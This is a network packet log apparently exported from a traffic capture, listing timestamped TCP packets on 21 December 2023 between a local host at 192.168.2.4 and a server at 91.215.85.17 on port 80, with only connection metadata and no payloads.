                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579288006 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579324961 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579324961 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579339027 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579353094 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579365015 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579404116 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579417944 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579431057 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579443932 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579459906 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579473972 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579514027 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579533100 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579533100 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579552889 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579566002 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579615116 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579629898 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579629898 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579663038 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579713106 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579726934 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579727888 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579768896 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579782963 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579802036 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579814911 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579823017 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579860926 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579869032 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579883099 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579916000 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579940081 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.579957962 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580012083 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580024958 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580043077 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580054998 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580071926 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580075979 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580095053 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580097914 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580116987 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580130100 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580158949 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580158949 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580189943 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580204010 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580243111 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580266953 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580276966 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580280066 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580291986 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580312967 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580338001 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580338001 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580346107 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580387115 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580434084 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580481052 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580481052 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580535889 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580549955 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580568075 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580579996 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580593109 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580602884 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580607891 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580631971 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580643892 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580656052 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580658913 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580658913 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580677986 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580702066 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580730915 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580740929 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580745935 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580785036 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580786943 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580805063 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580836058 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580852032 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580892086 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580905914 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580924034 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.580931902 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581013918 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581016064 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581016064 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581027985 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581064939 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581084013 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581095934 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581121922 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581127882 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581168890 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581183910 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581233025 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581245899 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581331968 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581336975 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581346035 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581360102 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581374884 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581396103 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581398964 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581414938 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581428051 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581456900 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581465006 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581473112 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581516981 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581540108 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581563950 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581571102 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581578970 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581590891 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581625938 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581643105 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581672907 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581686020 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581713915 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581720114 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581729889 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581763029 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581780910 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581813097 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581824064 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581849098 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581872940 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581886053 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581897020 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581931114 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581932068 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581952095 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.581985950 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582005024 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582012892 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582039118 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582047939 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582082033 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582089901 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582096100 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582139969 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582144022 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582165956 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582186937 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582199097 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582240105 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582243919 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582243919 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582252979 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582274914 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582317114 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582319021 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582418919 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582431078 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582451105 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582467079 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582467079 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582472086 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582515001 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582550049 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582571030 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582612038 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582654953 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582673073 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582690001 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582704067 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582720995 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582725048 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582739115 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582740068 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582782984 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582792997 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582804918 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582817078 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582863092 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582865953 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582897902 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582942963 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.582952976 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583009958 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583029985 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583043098 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583107948 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583123922 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583137989 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583173990 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583178043 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583190918 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583228111 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583240986 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583246946 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583282948 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583318949 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583343029 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583354950 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583368063 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583405972 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583419085 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583437920 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583457947 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583509922 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583527088 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583534956 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583547115 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583565950 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583569050 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583585024 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583602905 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583616972 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583637953 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583638906 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583647013 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583664894 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583717108 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583719969 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583729982 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583760977 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583775043 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583781958 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583791971 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583802938 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583831072 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583834887 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.583858967 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.585872889 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.595495939 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.595509052 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.595545053 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.595550060 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.595562935 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.595606089 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.595663071 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.595675945 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.595690012 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.595700979 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.595741034 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.595757961 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.595761061 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.595761061 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.595772028 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.595784903 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.595804930 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.595813036 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.595822096 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.595833063 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.595843077 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.595871925 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.595915079 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.595938921 CET804973891.215.85.17192.168.2.4
